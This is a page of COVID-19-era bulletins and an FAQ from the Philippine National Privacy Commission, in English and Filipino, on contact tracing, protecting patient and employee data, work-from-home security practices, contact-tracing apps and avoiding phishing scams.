Comments Off on NPC PHE Bulletin No. 13: Press Statement of Privacy Commissioner Raymund Eriquez Liboro on the collection of personal data to aid in contact tracing relevant to the COVID-19 responseThe National Privacy Commission (NPC) recognizes the importance of effective contact tracing and a whole of government approach as a main public health intervention and strategy against COVID-19.
Thus, the Commission is closely coordinating with the Department of Health (DOH) to ensure that its guidelines are consistent with the Data Privacy Act of 2012, the law’s implementing rules and regulations and other related NPC issuances.
DOH guidelines of tracingThe DOH released on April 17 Department Memorandum No. 2020 – 0189: Updated Guidelines on Contact Tracing of Close Contacts of Confirmed Coronavirus Disease (COVID-19) Cases.
The memorandum contains provisions on how to properly conduct effective contact tracing while being mindful of data privacy and rights of data subjects. It also establishes the Department of Health through its Epidemiological Bureau as oversight to all contact –tracing activities. (Sec IIIA.1)
Everyone is expected to be guided by this memorandum when collecting personal data. The DOH memorandum also applies to other government agencies.
NPC issuances
The NPC has issued guidelines on the collection, use and disclosure of personal information during the pandemic. Collect what is necessary but disclose only to proper authorities. Likewise, companies and government agencies are mandated to implement appropriate and reasonable security measures always.
Data quality is vital to effective contact tracing. Inaccurate information undermines the over-all aims to trace, misdirect government efforts and put human and other scarce resources to waste.
We believe successful contact tracing can only happen when there’s mutual trust between public health authorities and the citizenry. The public must give accurate information for contact tracing to be effective. But for the public to respond, they must rely on authorities to balance the risks to their rights and security and the promised benefits to public health, with the assurance that their data is processed fairly, lawfully, and securely.
Rest assured that the NPC is closely coordinating with concerned agencies on matters concerning data privacy.
# # #
-
NPC PHE Bulletin No. 12: Protecting Personal Data in a Work From Home Arrangement
Comments Off on NPC PHE Bulletin No. 12: Protecting Personal Data in a Work From Home ArrangementAs the Philippines was placed under varying levels of community quarantine to address the COVID-19 pandemic, organizations in the government and private sector implemented a work from home (WFH) setup, which is a type of telecommuting. Republic Act 11165 or the Telecommuting Act defines telecommuting as a “work arrangement that allows an employee in the private sector to work from an alternative workplace with the use of telecommunications and/or computer technologies.”
Given the public health emergency that the country faces, the National Privacy Commission (NPC) supports the adoption of the WFH set up as a viable strategy to balance the need to preserve the health and well-being of an organization’s workforce with the need to continuously operate and provide services to the public.
WFH and other telecommuting modes, is a management option determined by the organization as part of its Business Continuity Plan to facilitate organizational operations to continuously deliver work in the face of events such as typhoons, public safety or public health emergencies.
This setup, however, is not risk-free. Unauthorized access to and improper disposal of documents containing personal data due to unprotected home devices and physical files are just some of the potential dangers that come with it.
Thus, the NPC advises organizations operating under a WFH setup and other modes of telecommuting, to consider the following measures to ensure that the data privacy of data subjects remain protected.
These guidelines cover general security measures that organizations and individuals working on their own can take, not only during the pandemic but whenever a telecommuting arrangement is implemented.
GUIDELINES
Authorized Information Communication Technology (ICT) Assets. Organizations are responsible for making sure telecommuting employees are provided the proper ICT assets. In return, employees are accountable and responsible for the physical care of those assets.
- Computers and other ICT peripherals. Employers should issue their staff with appropriate ICT resources to adequately perform their duties.
Personal devices may be used if provision of organization-owned ICT resources is impractical. Such practice, however, must be governed by the organization’s Bring Your Own Devices (BYOD) policy.
- Removable Devices. Personnel are encouraged to only use organization-issued ICT peripherals (such as USB flash drives, USB mouse, USB keyboard, etc.) When using portable media, (such as disks or USB flash drives) to store or transfer data, the use of data encryption must be ensured.
- Software. Only softwares authorized by the organization must be used and only for official purposes. Avoid storing the organization’s digital files, including those with personal data, on external services and softwares.
- Proper configuration and security updates. Install security patches prior to and while WFH is enforced to prevent cyber security exploits and malicious damage, including the following:
- Automatic update & installation of operating system security patches
- Periodic scheduling & scanning of authorized antivirus software
- Automatic update, installation & configuration of web browser and its preferences
- Automatic update & installation of personal productivity softwares (i.e., word processor, spreadsheet processor, presentation software, etc.)
- Update and configuration of video conferencing software / platform
- Web Browser Hardening. Ensure that your browser is up to date & properly configured.
Below are the configurations for popular browsers.
Measures Chrome configuration Firefox configuration Edge configuration Browse in private
Use Incognito Window and delete private data when exiting browser
Use Private Window and delete private data when exiting browser
Use InPrivate Window and delete private data when exiting browser
Disable autofill of passwords and information
In Settings, disable Autofill Passwords, Payment methods, Addresses and more
In the Privacy and Security tab, disable Ask to save login and passwords; Enable Suggest and generate strong passwords; Enable Suggest and generate strong passwords
In Profiles, disable offer to save passwords and save and fill information
Prevent tracking
Enable "Do Not Track" request with your browsing traffic
Enable strict enhanced tracking protection;
Set to “Always” send websites a “Do Not Track” signal that you don’t want to be tracked
Enable Strict Tracking Prevention Check password exposure in breaches Warn you if passwords are exposed in a data breach Show alerts about passwords for breached websites Not applicable Control permissions Set all to “Ask before accessing” Set all permissions to “Block” by default Set all to “Ask first” Set all to “Ask first” - Video conferencing. If available, only use video conferencing platforms contracted by your organization, which should pass its privacy and security standards.
When availing of free platforms, use only an up-to-date version, one that offers adequate privacy & security features, and is properly configured:
- Set your meeting ‘private’ by default. Do not reveal meeting IDs in public domains
- Require meeting participants a password upon joining
- Make sure the meeting host is notified when people join and verifies identity of each
- Carefully control screen sharing & recording
- Keep cameras & microphones turned off, unless when speaking
- Avoid transferring files
Acceptable Use. Organizations must have an Acceptable Use Policy (AUP) that defines allowable personal uses of ICT assets. This may include:
- Personal emails
- Browsing of news and articles
- Social media/networking (can be defined in a separate organizational policy)
- Video streaming
While organization ICT assets should only be used for authorized purposes, the AUP must acknowledge that occasional personal use by employees may occur without adverse effect to the organization’s interests.
The AUP should also define unacceptable and unauthorized uses, which may include:
- Uses contrary to laws, customs, mores & ethical behavior
- Uses for personal benefit, entertainment, profit-oriented, partisan, or hostile activities.
- Uses that damage the integrity, reliability, confidentiality and efficiency of ICT resources
- Uses that violate the rights of other users
Access Control. Personnel access to organization data must only be on a “need-to-know-basis”, anchored on pre-defined user profiles and controlled via a systems management tool.
User Authentication. Require strong passwords to access personnel credentials and accounts. Passwords must be at least eight (8) characters long, comprising of upper- and lower-case letters, numbers and symbols. Prohibit sharing of passwords. Set up multifactor authentication for all accounts to deny threat actors immediate control of an account with a compromised password.
Network Security. When organization ICT assets are connected to personal hotspots and/or home Wi-Fis, observe the following:
- Don’t visit malicious webpages. Always look for the “https” prefix on the URL to ensure it is encrypted. Also, inspect the site’s certificate manually to validate owner identity.
- As much as possible, ensure high availability and reliability of internet connection.
- Configure the WiFi Modem or Router. Review and configure the following:
- Current devices connected;
- Encryption/Security: Wi-Fi Protected Access 2 (WPA2) Advanced Encryption Standard (AES) with a strong password.
- Avoid connecting office computers to public networks, such as coffee shop Wi-Fis. If left with no choice, use a reliable Virtual Private Network (VPN) when connecting.
Records and File Security. Set up policies to ensure sensitive data is processed in a protected and confidential manner to prevent unauthorized access, including:
- A records management policy
- A policy against posting sensitive documents in unauthorized channels, such as social media sites
- A policy imposing the use of a file’s digital version instead of physical records, whenever possible
- A retention policy for processing sensitive data in personal devices.
Emails. When transferring sensitive data via email, encryption of files and attachments should be done. Also, ensure that personnel always use the proper “TO, CC and BCC” fields to avoid sending to wrong recipients or needlessly expose other people’s email addresses to all recipients.
Physical security. Create workspaces in private areas of the home, or angle work computers in a way that minimizes unauthorized or accidental viewing by others.
- Lock away work devices and physical files in secure storage when not in use. Should there be a need to print documents, the personnel must ensure that physical and digital documents are properly handled and disposed of – in accordance with office policy.
- Never leave physical documents with sensitive data just lying around, nor use them as a “scratch paper”.
Security Incident Management. Personnel must immediately notify his or her immediate supervisor in case of a potential or actual personal data breach while working from home. The organization’s Data Protection Officer and/or Data Breach Response Team should immediately be alerted.
For further guidance, please review the NPC Circular on Personal Data Breach Management (click here).
RAYMUND ENRIQUEZ LIBORO
Privacy Commissioner# # #
- Computers and other ICT peripherals. Employers should issue their staff with appropriate ICT resources to adequately perform their duties.
-
NPC PHE Bulletin No. 11: Joint Statement of the Department of Health (DOH) and National Privacy Commission (NPC) on Processing and Disclosure of COVID-19 Related Data
Comments Off on NPC PHE Bulletin No. 11: Joint Statement of the Department of Health (DOH) and National Privacy Commission (NPC) on Processing and Disclosure of COVID-19 Related DataThis joint statement is issued by the Department of Health and the National Privacy Commission in response to concerns raised by various stakeholders on the processing and disclosure of COVID-19 patient data, including those of COVID-19 suspect, probable, or confirmed patients.
We uphold the Republic Act No. 11332 or the Mandatory Reporting of Notifiable Diseases and Health Events of Public Health Concern Act and the Data Privacy Act of 2012 in processing COVID-19 patient data in pursuit of disease surveillance and response.
As we call on all COVID-19 patients to truthfully and accurately disclose their personal data to proper authorities to help fight this pandemic, the DOH guarantees that the data privacy rights of these patients are protected. The DOH and NPC stand firm against any form of unbridled disclosure of patients’ personal data to the public that has been proven to cause a real risk of severe harm to patients.
We reiterate our appeal to all COVID-19 suspect, probable, and confirmed patients. Your honesty and cooperation will allow our front liners to adopt appropriate measures to protect themselves.
Rest assured that the DOH only discloses these data to public health authorities and concerned health care providers for purposes of contact tracing and management of the disease. These personally-identifiable data may also be disclosed to other government entities authorized based on DOH guidelines.
In these instances, public health authorities, concerned health care providers, and other government entities who are custodians of patients’ personal data have the legal obligation to protect the data privacy rights of these patients and ensure the confidentiality, integrity, and availability of their personal data.
We also remind public health authorities, concerned health care providers, and other government entities to ensure and protect the privacy of COVID-19 patient data and the data privacy rights of the patients. This way, we can help allay the fears of patients on COVID-related physical assaults, harassments, and discrimination, and encourage them to report their symptoms, take confirmatory tests, and submit themselves to treatments by proper authorities.
Fostering mutual trust and protection between patients and authorities is an indispensable part of our fight to defeat the COVID-19 pandemic.
-
NPC PHE Bulletin No. 10: Proteksyon Laban sa Hindi Awtorisadong Pagbunyag sa Datos ng Pasyente
Comments Off on NPC PHE Bulletin No. 10: Proteksyon Laban sa Hindi Awtorisadong Pagbunyag sa Datos ng PasyenteSa mga nagdaang linggo, ang National Privacy Commission (NPC) ay nakatanggap ng breach notifications ukol sa posibleng unauthorized diclosure o hindi awtorisadong pagsiwalat ng sensitibong personal na impormasyon ng suspected, probable at confirmed na mga pasyenteng may COVID-19. Kasalukuyang sinisiyasat na ng NPC ang mga nasabing insidente, alinsunod sa Data Privacy Act.
Upang maiwasan ang paglanap ng insidente ng unauthorized processing, nananawagan ang NPC sa mga institusyon na nagbibigay ng serbisyong pangkalusugan, at sa kanilang Data Protection Officers, na pagtibayin ang pangangalaga sa personal na datos ng mga pasyente. Tandaan natin, ang tiwala sa pagitan ng mga pasyente, institusyong pangkalusugan, at gobyerno ay importante sa pagsugpo sa COVID-19 pandemic.
Ang mga pasyente ay magbibigay ng totoo at kumpletong mga detalye na kailangan ng mga awtoridad kung panatag ang kanilang loob na ang kanilang sensitibong datos ay gagamitin lamang sa paggamot, pagmamatyag, at pagresponde sa COVID-19 pandemic --- at gagamitin lamang na may buong pagiingat, upang ‘di ito mabunyag sa iba o magamit sa paraan na magdudulot lamang ng stigma, gaya ng diskriminasyon, panliligalig, at pisikal na pananakit.
Narito ang mga hakbang upang mapagtibay ang organisasyonal, pisikal, at teknikal na mga seguridad sa pangangalaga ng datos ng inyong pasyente upang makaiwas sa unauthorized disclosure:
- Laging ipaalala sa inyong mga opisyal at empleyado na isang legal at moral na responsibilidad ang pagprotekta sa personal na datos ng mga pasyente. Gumamit ng praktikal na pamamaraan, gaya ng pag-dikit ng posters o pagmimigay ng print outs. Ipaalala na bilang katiwala ng datos, obligasyon nilang seguruhin ang confidentiality, integrity at availability nito.
Bigyang-diin na ang unauthorized disclosure ng datos ay ipinagbabawal ng batas, partikular sa Republic Act No. 11332 o the Mandatory Reporting of Notifiable Diseases and Health Events of Public Health Concern Act, at DPA. Ipaalala din na may nilagdaan silang non-disclosure agreement kaugnay dito.
- Magtalaga ng “access control” para sa datos ng pasyente, base sa “least privileges”. Limitahan ang pwedeng maka-access sa datos ng pasyente, ayon sa pangangailangan. Ibig sabihin, bigyan lamang ng sapat na access ang isang empleyado upang gampanan ang kanyang tungkulin, sa panahon na ito ay kailanagan.
- Maglagay ng kandado, alarma, at iba pang pisikal na kagamitan pang-seguridad. Seguraduhing ang inyong pasilidad ay hindi basta mapapasok ng hindi awtorisadong indibidwal. Kapag hindi ginagamit, ang mga dokumentong naglalaman ng datos ng pasyente, dapat nakakandado ang mga ito sa isang cabinet o silid.
- Sa tamang awtoridad lamang ibigay ang datos ng pasyente, at sa pribadong lugar lamang ito talakayin. Iwasang pag-usapan ang personal na detalye ng isang pasyente sa publikong lugar, maliban na lang kung bunsod ng emergency. Kung makikipag-usap gamit ang telepono, kumpirmahin muna ang identity ng nasa kabilang linya at kung awtorisado ba siya na tumanggap ng impormasyon patungkol sa pasyente.
- Lagyan ng privacy screens ang inyong computer upang ‘di masilip ng ‘di awtorisadong indibidwal ang impormasyon sa screen. Kung walang privacy screen, ipwesto ang computer monitors sa tagong cubicle o ianggulo ito sa paraang hindi agad mahahagip ng mata. Tiyakin din na may password ang computers o laptops.
- Siguraduhin na encrypted at may password ang inyong portable storage media (‘gaya ng USB flash drives at external hard drives) na naglalaman ng patient data. Itago ito sa isang locked cabinet kung hindi ginagamit, at tiyakin na hindi pakalat-kalat lamang sa desk, counters, conference rooms, at iba pang common areas.
- Tiyakin na may encryption ang electronic file o digital copies ng patient data.
- Siguraduhin na secure ang digital platform na gagamitin sa pakikipag-usap sa inyong team o pasyente. Lagyan ng encryption ang dokumento o files na ipapadala sa pamamagitan ng internet. Gumamit ng passwords na mahirap hulaan, at gumamit din second-factor authentication kapag nagla-login sa accounts.
RAYMUND ENRIQUEZ LIBORO
Privacy Commissioner# # #
- Laging ipaalala sa inyong mga opisyal at empleyado na isang legal at moral na responsibilidad ang pagprotekta sa personal na datos ng mga pasyente. Gumamit ng praktikal na pamamaraan, gaya ng pag-dikit ng posters o pagmimigay ng print outs. Ipaalala na bilang katiwala ng datos, obligasyon nilang seguruhin ang confidentiality, integrity at availability nito.
-
NPC PHE BULLETIN No. 10: Protecting Patient Data from Unauthorized Disclosure
Comments Off on NPC PHE BULLETIN No. 10: Protecting Patient Data from Unauthorized DisclosureIn recent weeks, the National Privacy Commission (NPC) has received several breach notifications which involve the possible unauthorized disclosure of sensitive personal information of suspect, probable and confirmed COVID-19 patients. The NPC is now looking into said breach incidents, in accordance with our internal procedures and in collaboration with concerned Personal Information Controllers (PICs), for remediation and other purposes within the bounds of the Data Privacy Act of 2012.
With a view to preventing unauthorized disclosure from happening, we call on health institutions and their Data Protection Officers (DPOs) to strengthen the protection of patient data. After all, fostering mutual trust and protection between patients, health institutions and authorities is crucial in dealing with the COVID-19 pandemic.
Patients will only fully and truthfully disclose the needed information to authorities if they feel assured that the information will be properly used for treatment, disease surveillance and response, and will be protected against any type of misuse, such as unauthorized disclosure, which has proven to result in stigma-driven physical assaults, harassments, and acts of discrimination.
Below are some of the organizational, physical and technical security measures that health institutions and their staff may enforce to protect patient data against unauthorized disclosure:
- Regularly remind officials and employees of their ethical and legal duty to protect patient data.
This reminder may come in the form of strategically located posters or print outs informing every one of their responsibility to protect the confidentiality, integrity and availability of patient data, which they have been entrusted with. Health institutions may want to emphasize that unauthorized disclosure is a prohibited act, both under Republic Act No. 11332 or the Mandatory Reporting of Notifiable Diseases and Health Events of Public Health Concern Act, and the Data Privacy Act of 2012. They should ensure that non-disclosure agreements and related contracts are in place and enforced. - Establish access control for patient data based on least privileges.
Only provide access on a “need-to-know” basis. This means that health personnel are allowed only the minimum and necessary access to enable the performance of their functions. - Equip facilities with physical access controls.
Protect physical access to facilities through locks and alarms. This is to ensure that only authorized personnel have access to facilities that house the systems and the data. At the same time, keep documents containing patient data in locked cabinets or secure rooms when not in use. - Only disclose patient data to proper authorities and in appropriate areas.
Refrain from discussing patient data in public areas where unauthorized parties may pick up personal data, unless when providing treatment under compelling circumstances. In addition, when discussing over the phone, confirm the identity of the person first and check whether he or she is authorized to receive such information. - Protect the computer display from unauthorized or accidental viewing.
Prevent the accidental viewing and disclosure of data through the use of privacy screens. If a privacy screen is not readily available or practical, place computer monitors inside secluded cubicles or angle them in such way that minimizes the chance of any unauthorized or accidental viewing by unauthorized individuals. Computers must be locked with a password whenever the authorized user leaves the workstation. - Lock storage media away when not in use.
If the use of portable storage media (such as USB flash drives or external hard drives), to store patient data is unavoidable, ensure that the files are encrypted and password protected. Also, make sure they are kept secure in your person when working in public places and not left absentmindedly on desks, counters, in conference rooms, and other common areas where it may be accessed by unauthorized individuals. - Ensure that patient data are encrypted, both in-transit and at rest.
Electronic copies of patient data must be protected in the same extent that physical files and storage media containing patient data are secured. Encrypting patient data both in-transit and at rest ensures that the files are locked and only accessible to authorized persons. - Communicate securely.
Choose a secure platform for care team collaboration and patient communication. For further protection, ensure that the documents are encrypted with a password of sufficient strength. The password must be sent via a separate channel like SMS/text. It is likewise advised that apart from setting a strong password, a second-factor authenticator may be used whenever logging into accounts.
RAYMUND ENRIQUEZ LIBORO
Privacy Commissioner# # #
- Regularly remind officials and employees of their ethical and legal duty to protect patient data.
-
NPC PHE BULLETIN No. 9: NPC Supports DILG’s bid vs discrimination of COVID-19 frontliners
Comments Off on NPC PHE BULLETIN No. 9: NPC Supports DILG’s bid vs discrimination of COVID-19 frontliners- The National Privacy Commission supports the call of the Department of the Interior and Local Government on local government units to enact ordinances to safeguard COVID-19 frontline workers against acts of discrimination.
- Being a communicable disease, COVID-19 carries with it a stigma that brings out the worst in others. This stigma affects not just patients but also frontliners --- health professions and hospital workers, police, military, and essential services personnel --- people who have put so much of themselves in the nation’s fight to contain the pandemic.
- Despite the services and sacrifices frontliners contributed to defend the rest of us against the pandemic, they often find themselves battling harassment, discrimination, and even violence from people who may be acting misguidedly out of dread or distress.
- Some frontliners even had their personal data shared in public, without their consent, thus exposing them to potential cyber-bullying, and causing them added stress and mental strain.
- Any form of discrimination against frontliners are downright wrong and must be penalized.
- Such discriminatory acts only disrupt the delivery of the most critical and valuable services our country needs right now.
- We need to act immediately to defend frontliners against discrimination, or risk losing the gains we achieved in this collective fight to beat the COVID-19 crisis.
RAYMUND ENRIQUEZ LIBORO
Privacy Commissioner# # #
-
NPC PHE BULLETIN No. 8: On COVID-19 -related apps, digital tools and solutions in this time of pandemic
Comments Off on NPC PHE BULLETIN No. 8: On COVID-19 -related apps, digital tools and solutions in this time of pandemic- The National Privacy Commission (NPC) supports the successful use of digital technologies and the processing of personal data to enable health authorities contain the COVID-19 pandemic, in a manner that is effective and preserves and protects the data privacy rights of individuals.
- For COVD-19 related apps to be successful , these must be inclusive and trusted. Therefore, efforts should be geared not only towards its rapid deployment but also in ensuring that the widest segment of the population with their devices can avail of these apps and that data quality is achieved. To be effective, such solutions must be trustworthy and acceptable for individual users to use with confidence so that users will share information without fear of misuse or discrimination.
- COVID-19 related apps can only achieve the desired level of uptake if it is clear about its legitimate purpose, is transparent on how it uses personal data and proportional in its collection. The App must not over-collect personal information from users and collect only what is necessary for the purpose.
- From the design stage, personal information controllers (PICs) must make sure that the app is solidly built on a legitimate purpose – making sure that it is limited to and consistent with the objective of helping defeat the COVID-19 pandemic. Thus, the app’s design, functionalities, personal data collection and extent of processing must never deviate from this purpose. Once the purpose is achieved, personal data processing must stop, while the collected and generated personal data must be disposed or discarded in a secure manner to prevent any further use. In doing so, breach-related privacy risks are minimized, thus enabling user trust and adoption by the general public.
- The personal data to be collected and the manner of processing must be moderated with the principle of proportionality. This means PICs must collect only the minimum data necessary to achieve the declared and specific purpose, using the least intrusive method.
- PICs must also ensure transparency by telling individual users, through an easy-to-understand privacy notice, how the app or digital solution will collect, use, store, and dispose their personal data. Users must also be made aware to whom, if any, shall their personal data be disclosed incidental to the processing.
- Considering the inherent vulnerability of personal data processing over the internet and in anticipation of the latest cyber threats, PICs must also ensure that appropriate security measures are identified and implemented. PICs are also expected to inform users of their data subject rights and incorporate mechanisms to easily exercise them.
RAYMUND ENRIQUEZ LIBORO
Privacy Commissioner# # #
-
NPC PHE BULLETIN No. 6: Collect the minimum necessary information in providing financial aid and other relief packages to those affected by the enhanced community quarantine
Comments Off on NPC PHE BULLETIN No. 6: Collect the minimum necessary information in providing financial aid and other relief packages to those affected by the enhanced community quarantineThe National Privacy Commission (NPC) supports efforts by the national government to provide much-needed assistance to our people in these extraordinary times.
We remind all government offices, including local government units, to further ease the people’s burden by exercising proportionality and collecting less of their data to facilitate such assistance.
Collect only necessary personal details, such as those required according to usual accounting, auditing, and budgeting rules and regulations when disbursing public funds, as well as other applicable laws and regulations.
Avoid burdening recipients with personal data requirements that are beyond the minimum necessary, which would only impede the speedy flow of aid distribution in this time of urgency.
All collected personal data must be safeguarded to prevent any unauthorized access and use. Appropriate retention and disposal policies should also be in place. Collect to meet present objectives and discard any notion of possible future use of the data.
On the part of the employers, the need to obtain consent from concerned affected workers is not required under the present emergency when submitting requirements to government regulatory agencies mandated to distribute aid to these workers.
It is during these trying times that the data protection officers of companies are needed to provide timely and sensible advice to their management, considering all attendant circumstances and mindful of the rights and interests of the affected workers.
NPC remains committed to working with all agencies tasked in distributing aid to provide additional guidance and inputs, as may be necessary and appropriate.
For further guidance, we may be reached at [email protected].
RAYMUND ENRIQUEZ LIBORO
Privacy Commissioner -
NPC PHE BULLETIN No. 3: Wastong Pangangalaga sa Personal na Impormasyong Pangsugpo sa COVID-19 Pandemic
Comments Off on NPC PHE BULLETIN No. 3: Wastong Pangangalaga sa Personal na Impormasyong Pangsugpo sa COVID-19 Pandemic -
NPC PHE BULLETIN No. 4: Protecting personal data in the time of COVID-19
Comments Off on NPC PHE BULLETIN No. 4: Protecting personal data in the time of COVID-19A growing number of online fraudsters are exploiting the public fear surrounding the COVID-19, using the pandemic to lure people into clicking phishing emails and installing malwares capable of stealing personal data and money.
Our fear during a crisis can expose us to data privacy risks, predisposing us to make hasty or ill-informed choices online, which fraudsters are taking advantage of.
In view of these heightened risks, the National Privacy Commission is appealing to everybody to be very careful online, especially when using online financial services and accessing health-related apps. Be cautious with the sites you visit, enhance your privacy settings, and protect your personal data.
In this period of home quarantine, digital access becomes our main gateway not just for news but also to coordinate tasks with co-workers, make online financial transactions and most importantly, get in touch with loved ones.
Indeed, now is the worst possible time to fall victim to online fraudsters. They can steal your sensitive data, cause you financial and reputational damages, make your device unusable and cut you off from the outside world.
To avoid such scenarios, we need to be vigilant and familiarize ourselves with the warning signs.
The National Privacy Commission encourages everyone to practice the following tips to protect personal data in the time of COVID-19:
- Do not give out your personal data in suspicious COVID-themed emails and messages.Is the email or message unsolicited? Does it urgently encourage you to open the attached file? Is it promising COVID vaccines or cure that you have not heard of at all in the news or credible websites? Do not click them. It is most likely a phishing attack that steals your financial data such as credit card or online banking details.
- Make trusted government and other legitimate websites your go-to source for the latest COVID information.We have a lot of questions about the pandemic. We will not find these answers, however, on some random websites or applications. What we may find on these sites instead are suspicious links, pop-ups and downloadable files, resulting in a ransomware infection that locks us out of our devices. Not only do you protect yourself from ransomware by relying on trusted sources, you also get to avoid misinformation.
- Ensure that the charity or crowdfunding campaign you plan to donate to is legitimate.Research online or through your social media contacts from whom you learned of the charity or crowdfunding campaign. Know where your donations will go. Think twice if the charity rushes or pressures you or makes unrealistic promises just to get you to donate. If you’ve decided to make the donation, be sure to check your bank statements and see if you’ve been charged the right amount.
- Be mindful of phishing baits from online scammers. Scammers want you to click on a link or give your password, account number and other personal information. This way they can steal your identity, money and gain access to your computer or cellphone. To do this, they use familiar company names or pretend like someone you know. They pressure you to act now or else.
When you receive such messages, be skeptical. Look up the website or phone number for the company or person contacting you. Call them directly using the company’s official number or email. Never give any personal information especially your password and pin number.
Most phishing attempts use bad grammar and spelling. There are some, however, that looks legitimate and very convincing.
During this critical period, all our focus and efforts should go to the fight against the spread of the COVID-19 virus. We should avoid, at all cost, getting sidetracked by these digital pitfalls.
In case you feel that your personal data have been compromised, please feel free to contact our complaints and investigation team. You may email us at [email protected] and [email protected].
RAYMUND ENRIQUEZ LIBORO
Privacy Commissioner -
NPC PHE BULLETIN No. 3: Collect what is necessary. Disclose only to the proper authority.
Comments Off on NPC PHE BULLETIN No. 3: Collect what is necessary. Disclose only to the proper authority.Data protection in times of Emergency
The National Privacy Commission recognizes the extraordinary challenges our nation is facing due to this unfamiliar global pandemic. We all share the same concern and the urgent need to contain the spread of the virus. To win this battle against COVID- 19, trusted and verified information is vital. Thus, during this time, it is not only the “misuse” of data that concerns us but also the “missed” use that could have made a difference in containing the disease.
Data protection and privacy should not hinder the government from collecting, using, and sharing personal information during this time of public health emergency. Neither does the law limit public health authorities from using available technology and databases to stop the spread of the virus. The principles contained in the law allow the use of data to treat patients, prevent imminent threats, and protect the country’s public health and still provide the level of protection the citizens expect. The Data Privacy Act of 2012 is an enabler in critical times like this.
We will continue issuing guidance to support our health practitioners and government units to properly and effectively use personal data to ensure the safety and security of everyone. For our front-liners: “To be able to communicate directly with the public, the medical and scientific community, and other government bodies. To coordinate nationally and globally”.
The following FAQs have been collated by our NPC staff to answer questions raised by government agencies, private companies, and the public. We will try our best to continue to respond to your queries in the days ahead.
The direction is lawful and straightforward. COLLECT WHAT IS NECESSARY. DISCLOSE ONLY TO THE PROPER AUTHORITY.
The power of data in responding to this global public health emergency cannot be overstated. The NPC is fully ready to help facilitate the safe and rapid flow of data to fight COVID-19
RAYMUND ENRIQUEZ LIBORO
Privacy CommissionerFAQs
Questions raised by stakeholders on the processing of personal data concerning the state of public health emergency (PHE) and the COVID-2019 response:
On monitoring of persons entering offices/buildings
1. Can we collect the details (name, contact details, and travel history) of all persons who will be entering our building through a form as may be required by a Department of Health (DOH) circular?
Yes, the building or office administrators may collect such personal data but only as may be necessary with what is required by the DOH.
2. Will the mere filling out and signing of such form amount to the consent required by the Data Privacy Act of 2012 (DPA)?
The basis of the processing of data in this scenario is not consent. Its lawfulness rests on the mandate of the Department of Health, given the declaration of the state of public health emergency in response to the COVID-19 pandemic.
It is advisable, though, to provide a privacy notice informing the visitors of the purpose and basis of the collection of such personal data. Once collected, reasonable and appropriate safeguards must ensure the security of the forms and personal data contained therein.
3. What are the specific data elements that we should collect from guests/visitors?
The specific data elements to be collected should be coordinated with the DOH as these would depend on what the latter needs to facilitate contact tracing.
Further information is available at the DOH website: https://www.doh.gov.ph/2019-nCov/interim-guidelines, and specifically for contact tracing: https://www.doh.gov.ph/sites/default/files/health-update/DC2020-0048-Reiteration-of-DM2020-0068-Interim-Guidelines-on-Contact-Tracing-for-Confirmed-2019-nCoV-ARD-Cases.pdf
On employees; collection of personal data
4. Can an employer ask its employees to submit declaration forms that provide personal data – for instance, whether they have traveled to or been in close contact with persons who have gone to regions affected by COVID-19, whether they are experiencing symptoms, etc.?
Yes, employers may collect such personal data. The National Privacy Commission (NPC) reminds all employers to collect what is only necessary, observing the general data privacy principle of proportionality. Once collected, reasonable and appropriate safeguards should ensure the security of the forms and personal data contained therein.
5. What are the specific data elements that an employer should collect?
The specific data elements to be collected should be coordinated with the DOH as these would depend on what the latter needs to facilitate contact tracing.
Further information is available at the DOH website: https://www.doh.gov.ph/2019-nCov/interim-guidelines, and specifically for contact tracing: https://www.doh.gov.ph/sites/default/files/health-update/DC2020-0048-Reiteration-of-DM2020-0068-Interim-Guidelines-on-Contact-Tracing-for-Confirmed-2019-nCoV-ARD-Cases.pdf
6. Can the employer disclose the personal data collected from employees to third parties?
Disclosure of employee data in this scenario should be limited to the DOH and other appropriate government agencies and following all existing protocols on the matter.
7. Should we ask our employees to sign a consent form or waiver that their information will be shared with the DOH if needed or requested?
Since the basis for the disclosure is not consent, then no consent form is needed. Instead, a privacy notice should be put in place informing employees of the purpose of collection.
On contact tracing; persons under investigation
8. Does an employer need to ask for the consent of an employee who is a person under investigation (PUI) for COVID-19 when disclosing the PUI’s data to the person/s that such PUI have had contact with during the time of suspected infection?
Contact tracing should be done only upon the authority, guidance, and instruction of the DOH.
See the DOH Interim Guidelines on Contact Tracing available here at this link: https://www.doh.gov.ph/sites/default/files/health-update/DC2020-0048-Reiteration-of-DM2020-0068-Interim-Guidelines-on-Contact-Tracing-for-Confirmed-2019-nCoV-ARD-Cases.pdf
9. If a PUI has been proven positive of the COVID-19, can I freely disclose the identity to everyone within the company? The purpose is to inform those who may have had contact with the person so they can be tested and monitored as well
The company may make the necessary notices internally without disclosing the identity of the person who is COVID-19 positive. The proper authority that does contact tracing is the DOH. It follows that disclosure of the identity of the patient shall be limited to the DOH personnel only, following the PUM/PUI protocol.
Companies should only disclose such personal information as may be necessary to enable other employees to assess their health and potential exposure. Here, revealing the identity of the COVID-19 patient offers no benefit to the patient nor any advantage to other members of the company in assessing their exposure. If someone in your company tests positive, protocols, and guidelines for PUMs/PUIs would apply and, generally, would cover everyone.
10. Can our company issue a press release or statement relating to our employee, who is a confirmed case for COVID-19?
Announcements should come from the DOH or other appropriate government agencies. The government should only make the official announcement regarding COVID-19 cases in the country. Anyone with relevant information should immediately relay it to the DOH for proper handling.
11. Can the DOH release names of PUIs that are purposely evading or escaping mandatory quarantine, as well as those who deliberately lied about their medical and travel history to protect the public and apprise them of the possible threat of contamination?
The DOH needs to consider the following factors when assessing the disclosure of patient information to the public:
-
-
- The potential harm or distress to the patient arising from the disclosure
- The potential damage to trust in doctors and health institutions in general
-
and weigh it versus:
-
-
- The potential harm to the public if the information is not disclosed.
- The potential benefits to individuals and society arising from the release of information.
-
Apart from the Data Privacy Act of 2012, there is another law relevant to this matter. RA No. 11332 or the Mandatory Reporting of Notifiable Diseases and Health Events of Public Health Concern Act penalizes non-cooperation of the persons identified as having a notifiable disease or affected by the health event of public concern.
The DOH makes the crucial call on what information is necessary for release to the public, taking into consideration the state of public health emergency and the overall strategy to contain the virus as directed by the Inter-Agency Task Force.
12. Can the DOH publicly disclose more detailed information of the frequented locations of the persons positive for COVID-19 to inform the public better and help prevent the transmission of the virus?
Yes. The DOH can provide information about the frequented locations of the persons positive for COVID-19 without giving details that would identify individuals.
*** *** ***
Personal information controllers are advised to approach any uncertainty as to the collection and disclosure of personal data of PUIs, PUMs, and confirmed cases of COVID-19 in a reasonable manner.
